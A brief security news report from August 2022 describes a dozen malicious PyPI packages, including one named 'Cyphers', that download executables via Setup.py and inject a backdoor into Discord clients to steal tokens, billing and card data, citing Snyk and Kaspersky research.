Security News > 2022 > August > A dozen PyPI packages turn Discord into an info-stealing backdoor
A dozen malicious PyPi packages have been discovered installing malware that modifies the Discord client to become an information-sealing backdoor and stealing data from web browsers and Roblox.
This malicious set of PyPi Python packages has not been removed from the open source package repository at the time of writing this, so software developers are still at risk.
As part of a new report by Snyk, researchers analyze one of these malicious Python packages named "Cyphers," showing how malicious code hidden in the "Setup.py" file is used to install two malware executables from a Discord CDN server, namely "ZYXMN.exe" and "ZYRBX.exe."
Even more interesting, the malware will modify the actual JavaScript files used by the Discord client to inject a backdoor that can steal information directly from your Discord account.
The clients targeted for this injection are Discord, Discord Development, Discord Canary, and Discord PTB. With the script injected, when Discord is restarted, it will perform a variety of negative behavior, including stealing authentication tokens, Nitro status, billing information, and credit cards.
More malware on PyPI. Yesterday, Kaspersky published a report where it presented two other PyPi packages that contain info-stealing malware and also modify the Discord client as well.